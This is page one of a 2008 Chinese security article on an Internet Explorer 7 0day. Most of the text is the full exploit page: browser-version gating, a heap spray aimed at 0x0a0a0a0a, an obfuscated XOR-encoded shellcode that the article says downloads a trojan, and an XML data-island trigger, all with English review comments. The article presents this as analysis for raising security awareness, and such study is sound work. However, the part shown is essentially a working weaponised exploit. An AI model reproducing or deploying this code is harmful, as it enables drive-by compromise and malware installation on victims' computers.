
攻防实战:深入剖析最新IE7.0 0day漏洞利用代码(1)

2008年12月15日

这几天国内几乎所有的媒体都用大幅的版面报道了IE7.0的最新漏洞。由于微软迟迟没有推出安全补丁,并且该漏洞能影响到所有使用IE控件的程序,包括各主要浏览器、邮件客户端、办公软件、RSS订阅器以及可嵌入网页的所有第三方软件,影响范围极其广泛!笔者做了一个试验,在Google中搜索一下“ie7.0 0day”,出来2700多条记录;各大杀毒厂商纷纷推出漏洞修复工具以及预防方法,感觉比MS08-067漏洞还热闹,算是岁末安全界的一件大事。

12月9日,国内一些安全界知名人士的blog纷纷贴出了漏洞代码,不少无赖网站也纷纷挂上了恶意代码以获取利益。笔者的几个朋友未能幸免,点击恶意网站后导致机器蓝屏、无法加载系统,只得郁闷地重装。为了了解恶意代码的危害,提高大家的安全意识,笔者在这里对该恶意代码进行一个简单的分析,希望能对大家有所帮助,避免不必要的损失。

获取IE7.0 最新漏洞代码

1.获取IE7.0 0day代码

获取代码的一个最好的方式就是通过Google等搜索工具搜索,推荐在本地的虚拟机中使用VPN代理到Google英文版中搜索,相对而言国外会早于国内公布0day代码。关于该漏洞代码,现在很多安全和黑客网站都已经贴出了代码,如果没有该代码的可以到http://www.antian365.com/bbs/viewthread.php?tid=2813&extra=page%3D1(呵呵,顺便帮团队做下广告)获取。将以下代码保存为IE7_0day.htm,即IE7.0 0Day。注意:下面这段代码是能直接触发漏洞并执行内嵌shellcode的真实攻击代码,只能在做好快照、断开网络的隔离虚拟机(IE7 + Windows XP/2003)中打开,切勿在日常使用或生产环境的机器上运行;另外,网页排版把spray(...)里那段超长的字符串常量折成了多行,而JavaScript的字符串不能跨行,保存时需把它重新接成一行,否则语法上就不合法。

<script language="javascript">
// First gate: anything whose user-agent does not contain "msie 7" is bounced
// to about:blank before the spray and trigger below run. A second, stricter
// gate (IE major version 7 on XP / Server 2003) sits near the end of the script.
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)location.replace("about:blank");
// Busy-wait for roughly `milliseconds` ms without setTimeout, so the script
// (and whatever it has allocated so far) stays blocked in place.
// The spin is also capped at 1e7 polls of the clock, so on a slow machine it
// can return before the requested time has elapsed.
function sleep(milliseconds)
{
var deadline=new Date().getTime()+milliseconds;
var spins=0;
while(spins<1e7)
{
if(new Date().getTime()>deadline){break}
spins++;
}
}
// Heap spray. `sc` is the shellcode as a "%u"-escape string in which every
// "%u" has been replaced by the word "dadong" (swapped back here before
// unescape, so the raw page never contains the signature-prone "%uXXXX" form).
// Each sprayed block is 0x100000 bytes (1 MiB): a slide made of the word
// 0x0a0a repeated, followed by the shellcode. 0x0a0a0a0a is therefore both the
// address the bug is presumably steered to and the content found at that
// address — any such pointer into the sprayed range lands in the slide.
// (0x0a0a0a0a-0x100000)/0x100000 ≈ 159.6, so the loop allocates 160 blocks
// (~160 MiB of strings).
// aaablk, zzchuck and i are deliberately left as implicit globals so the
// sprayed strings stay referenced (and thus resident) after spray() returns.
function spray(sc)
{
var infect=unescape(sc.replace(/dadong/g,"\x25\x75")); // "\x25\x75" is "%u"
var heapBlockSize=0x100000;
var payLoadSize=infect.length*2; // byte size: JS strings are UTF-16
var szlong=heapBlockSize-(payLoadSize+0x038); // 0x38 presumably covers string/heap header overhead — not verified here
var retVal=unescape("%u0a0a%u0a0a");
retVal=getSampleValue(retVal,szlong); // pad the slide to szlong bytes
aaablk=(0x0a0a0a0a-0x100000)/heapBlockSize;
zzchuck=new Array();
for(i=0;i<aaablk;i++){zzchuck[i]=retVal+infect}
}
// Helper for spray(): grow `retVal` by repeated self-concatenation until it
// holds at least `szlong` bytes (length*2, since JS strings are UTF-16), then
// trim it to exactly szlong/2 characters. Returns the padded string.
// NOTE(review): an empty `retVal` never grows, so that input would spin forever.
function getSampleValue(retVal,szlong)
{
var padded=retVal;
for(;;)
{
if(padded.length*2>=szlong){break}
padded+=padded;
}
return padded.substring(0,szlong/2)
}
// NOTE(review): live exploit payload — handle only inside an isolated VM.
// "dadong" stands in for "%u" (spray() swaps it back before unescape), so each
// "dadongXXXX" is one little-endian 16-bit word of code: the leading 9090 words
// are x86 NOPs. The body is not plain shellcode: the words right after the NOPs
// (E1D9 34D9 5824 5858 ...) read as a fnstenv-based get-PC stub, and the
// 3080 4021 FAE2 words that follow read as `xor byte [eax],0x21; inc eax; loop`,
// i.e. the rest appears to be single-byte XOR-0x21 encoded — which is why the
// tail is a long run of 2121 words (encoded zero padding). Confirm by decoding;
// the article's page 4 ("木马下载文件") reports the decoded payload downloads
// and runs a trojan.
// NOTE(review): as rendered on this page the string literal is wrapped across
// many lines. A JavaScript string cannot contain a raw newline, so the original
// must have been a single line; the wrapping has to be undone for this to parse.
var a1="dadong";
spray(a1+"9090"+a1+"dadong9090dadong9090dadongE1D9dadong34D9dadong5824dadong5858dadong3358dadongB3DBdadong031C
dadong31C3dadong66C9dadongE981dadongFA65dadong3080dadong4021dadongFAE2dadong17C9dadong2122dadong4921dadong0121
dadong2121dadong214BdadongF1DEdadong2198dadong2131dadongAA21dadongCAD9dadong7F24dadong85D2dadongF1DEdadongD7C9
dadongDEDEdadongC9DEdadong221Cdadong2121dadongD9AAdadong19C9dadong2121dadongC921dadong206Cdadong2121dadong67C9
dadong2121dadongC921dadong22FAdadong2121dadongD9AAdadong03C9dadong2121dadongC921dadong2065dadong2121dadong11C9
dadong2121dadongC921dadong22A8dadong2121dadongD9AAdadong2DC9dadong2121dadongC921dadong2040dadong2121dadong3BC9
dadong2121dadongCA21dadong7279dadongFDAAdadong4B72dadong4961dadong3121dadong2121dadongC976dadong2390dadong2121
dadongC4C9dadong2121dadong7921dadong72E2dadongFDAAdadong4B72dadong4901dadong3121dadong2121dadongC976dadong23B8
dadong2121dadongECC9dadong2121dadong7921dadong76E2dadong1DC9dadong2125dadongAA21dadong12D9dadong68E8dadongE112
dadongE291dadongD3DDdadongAC8FdadongDE66dadongE27Edadong1F7Adadong26E7dadong1F99dadong7EA8dadong4720dadongE61F
dadong2466dadongC1DEdadongC8E2dadong25B4dadong2121dadongA07Adadong35CDdadong2120dadongAA21dadong1FF5dadong23E6
dadong4C42dadong0145dadongE61Fdadong2563dadong420Edadong0301dadongE3A2dadong1229dadong71E1dadong4971dadong2025
dadong2121dadong7273dadongC971dadong22E0dadong2121dadongF1DEdadongDDAAdadongE6AAdadongE1A2dadong1F29dadong39AB
dadongFAA5dadong2255dadongCA61dadong1FD7dadong21E7dadong1203dadong1FF3dadong71A9dadongA220dadong75CDdadongE112
dadongFA12dadongEDAAdadongD9A2dadong5C75dadong1F28dadong3DA8dadongA220dadong25E1dadongD3CAdadongEDAAdadongF8AA
dadongE2A2dadong1231dadong1FE1dadong62E6dadong200Ddadong2121dadong7021dadong7172dadong7171dadong7171dadong7671
dadongC971dadong2218dadong2121dadong38C9dadong2121dadong4521dadong2580dadong2121dadongAC21dadong4181dadongDEDE
dadongC9DEdadong2216dadong2121dadongFA12dadong7272dadong7272dadongF1DEdadong19A1dadongA1C9dadongC819dadong2E54
dadong59A0dadongB124dadongB1B1dadong55B1dadong7427dadongCDAAdadong61ACdadongDE24dadongC9C1dadongDE0FdadongDEDE
dadongC9E2dadongDE09dadongDEDEdadong3099dadong2520dadongE3A1dadong212Ddadong3AC9dadongDEDEdadong12DEdadong71E1
dadongC975dadong2175dadong2121dadongC971dadong23AAdadong2121dadongF1DEdadongA117dadong051Ddadong5621dadongC92B
dadong2360dadong2121dadongDE12dadongDE76dadongC9F1dadong20DAdadong2121dadongDE49dadong2121dadongDE21dadongC9F1
dadongDFC9dadongDEDEdadong7672dadong1277dadong71E1dadongC975dadong213Fdadong2121dadongC971dadong2374dadong2121
dadongF1DEdadongA117dadong051Ddadong5621dadongC92Bdadong232Adadong2121dadongDE12dadongDE76dadong79F1dadong7E7F
dadongE27Adadong23CAdadongE279dadongD8C9dadongDEDEdadong77DEdadongA276dadong29CDdadongDDAAdadong294Bdadong1F76
dadong56DEdadongC935dadong237Cdadong2121dadongF1DEdadongDDAAdadong4049dadong444Cdadong4921dadong6468dadong5367
dadongD5AAdadong2998dadong2121dadongD221dadong5487dadong4B0Edadong1F21dadong55DEdadong0105dadong05C9dadong2123
dadongDE21dadongAAF1dadongC9D9dadong20EAdadong2121dadongF1DEdadongD91Adadong2955dadongAA17dadong0565dadong1F01
dadong21DEdadongDE1Fdadong0555dadongC93Ddadong20CEdadong2121dadongF1DEdadongE5A2dadong7E31dadong997Fdadong2120
dadong2121dadong49E2dadong4F4Edadong2121dadong5449dadong4D53dadongCA4CdadongAC34dadong0565dadong7125dadong03C9
dadongDEDFdadong71DEdadong6BC9dadong2123dadongC821dadongDFC3dadongDEDEdadongC7C9dadongDEDEdadongA2DEdadong29E5
dadong4BE2dadong494Ddadong554Fdadong4D45dadong34CAdadong65ACdadong2505dadongC971dadongDCDAdadongDEDEdadongC971
dadong2302dadong2121dadong9AC8dadongDEDFdadongC9DEdadongDEC7dadongDEDEdadongE5A2dadongE229dadong1249dadong2113
dadong4921dadong5254dadong5344dadong34CAdadong65ACdadong2505dadongC971dadongDCF0dadongDEDEdadongC971dadong20D8
dadong2121dadongB0C8dadongDEDFdadongC9DEdadongDEC7dadongDEDEdadongE5A2dadongE229dadong4249dadong5657dadong4921
dadong4952dadong4E45dadong34CAdadong65ACdadong2505dadongC971dadongDC86dadongDEDEdadongC971dadong20EEdadong2121
dadong46C8dadongDEDFdadongC9DEdadongDEC7dadongDEDEdadongE5A2dadongE229dadong5749dadong5946dadongCA21dadongAC34
dadong0565dadong7125dadongA3C9dadongDEDCdadong71DEdadong8BC9dadong2120dadongC821dadongDF63dadongDEDEdadongC7C9
dadongDEDEdadongA2DEdadong25E5dadongC9E2dadong208Adadong2121dadong3A49dadong67E7dadong7158dadongE7C9dadong2120
dadongA221dadong29E5dadongC9E2dadong20B6dadong2121dadongCD49dadong22B6dadong712Ddadong93C9dadong2120dadongA221
dadong29E5dadongC9E2dadong20A2dadong2121dadong8B49dadong2CDDdadong715DdadongBFC9dadong2120dadongA221dadong29E5
dadongC9E2dadong204Edadong2121dadongCC49dadongCE77dadong7117dadongABC9dadong2120dadongA221dadong29E5dadongC9E2
dadong207Adadong2121dadongD149dadong25ABdadong717Edadong57C9dadong2120dadongA221dadong29E5dadongC9E2dadongDFD6
dadongDEDEdadong5949dadongFA49dadong713Ddadong43C9dadong2120dadongA221dadong29E5dadongC9E2dadong2012dadong2121
dadongCE49dadongC1EFdadong7141dadong6FC9dadong2120dadongA221dadong29E5dadongC9E2dadong203Edadong2121dadong9149
dadong0C68dadong71FAdadong1BC9dadong2120dadongA221dadong29E5dadongC9E2dadongDE17dadongDEDEdadong8A49dadongBA7F
dadong713Fdadong07C9dadong2120dadongA221dadong29E5dadongC9E2dadongDF86dadongDEDEdadong7849dadongA0B6dadong7123
dadong33C9dadong2120dadongA221dadong29E5dadongC9E2dadong21C2dadong2121dadong5F49dadongC3F9dadong7152dadongDFC9
dadong2121dadongA221dadong29E5dadongC9E2dadong21EEdadong2121dadongBF49dadong9AD8dadong7114dadongCBC9dadong2121
dadongA221dadong29E5dadongC9E2dadongDFB3dadongDEDEdadong7649dadong9481dadong719AdadongF7C9dadong2121dadongA221
dadong29E5dadongC9E2dadongDF5FdadongDEDEdadong3B49dadong3F5Bdadong7123dadongE3C9dadong2121dadongA221dadong29E5
dadongC9E2dadongDF4BdadongDEDEdadongC149dadong117Adadong71B5dadong8FC9dadong2121dadongA221dadong29E5dadongC9E2
dadongDF77dadongDEDEdadongB649dadongC3E8dadong7182dadongBBC9dadong2121dadongA221dadong29E5dadongC9E2dadongDF63
dadongDEDEdadong4949dadongE405dadong7192dadongA7C9dadong2121dadongA221dadong29E5dadongC9E2dadong2176dadong2121
dadong5349dadong92DFdadong7137dadong53C9dadong2121dadongA221dadong29E5dadongC9E2dadongDF65dadongDEDEdadong32CA
dadong444BdadongC971dadongDAD6dadongDEDEdadongC971dadongDF8AdadongDEDEdadong96C8dadongDEDDdadongC9DE
dadongDEC9dadongDEDEdadongC9E2dadongDC88dadongDEDEdadong6E49dadong6ECEdadong7124dadong1FC9dadong2121
dadongA221dadong29E5dadongC9E2dadong212Edadong2121dadongAF49dadong2F6Fdadong71CDdadong0BC9dadong2121dadongA221
dadong29E5dadong12E2dadong45E1dadong61AAdadongA411dadong59E1dadong1F31dadong61AAdadong1F2Ddadong51AAdadong8C3D
dadongAA1Fdadong2961dadongCAE2dadong1F2Adadong61AAdadongA215dadong5DE1dadongAA1Fdadong1D61dadong41E2dadongAA17
dadong054Ddadong1705dadong64AAdadong171Ddadong75AAdadong5924dadongF422dadongAA1Fdadong396BdadongAA1Fdadong017B
dadongFC22dadong1AC2dadong1F68dadong15AAdadong22AAdadong12D4dadong12DEdadongDDE1dadongA58Ddadong55E1dadongE026
dadong2CEEdadongD922dadongD5CAdadong1A17dadong055Ddadong5409dadong1FFEdadong7BAAdadong2205dadong47FCdadongAA1F
dadong6A2DdadongAA1Fdadong3D7BdadongFC22dadongAA1FdadongAA25dadongE422dadongA817dadong0565dadong403DdadongC9E2
dadongDA47dadongDEDEdadong5549dadong5155dadong0E1Bdadong560Edadong5656dadong430Fdadong4840dadong444Adadong0F42
dadong4F42dadong450Edadong564Edadong0E4Fdadong4E4Adadong440Fdadong4459dadong2121dadong2121dadong2121dadong2121dadong2121
dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121
dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121
dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121
dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong0021");
// Blocks for ~3 s after the spray, before the trigger is written. The article
// does not say why; presumably to let the allocations settle.
sleep(3000);
nav=navigator.userAgent.toLowerCase();
// Second gate (the first is at the top of the script): only IE whose
// appVersion reports major version 7, on Windows XP (NT 5.1) or Server 2003
// (NT 5.2), gets the trigger. nav, version, w2k3 and wxp are implicit globals.
if(navigator.appVersion.indexOf('MSIE')!=-1)
{
version=parseFloat(navigator.appVersion.split('MSIE')[1])
}
// NOTE(review): if appVersion has no 'MSIE', `version` was never assigned and
// this comparison throws a ReferenceError — harmless here, since non-IE7
// agents were already redirected to about:blank at the top of the script.
if(version==7)
{
w2k3=((nav.indexOf('windows nt 5.2')!=-1)||(nav.indexOf('windows 2003')!=-1));
wxp=((nav.indexOf('windows nt 5.1')!=-1)||(nav.indexOf('windows xp')!=-1));
// Trigger, written into the live document: two XML data islands sharing the
// ID "I", each bound to a SPAN through DATASRC/DATAFLD with DATAFORMATAS=HTML,
// and an <image> element whose SRC contains &#2570; (U+0A0A — the same 0x0a0a
// word the spray fills memory with) plus a second, duplicate src attribute.
// The exact memory-corruption mechanism is not shown on this page (the
// article's page 5, "分析漏洞代码", covers it).
if(wxp||w2k3)document.write('<XML ID=I><X><C><![CDATA[<image SRC=http://&#114;&#2570;&#114;.book.com src=http://www.google.com]]><![CDATA[>]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>');
// Ten assignments to window.status after the write; purpose not stated —
// presumably just keeps the script running briefly while the trigger fires.
var i=1;while(i<=10)
{
window.status=" ";i++}
}
</script>


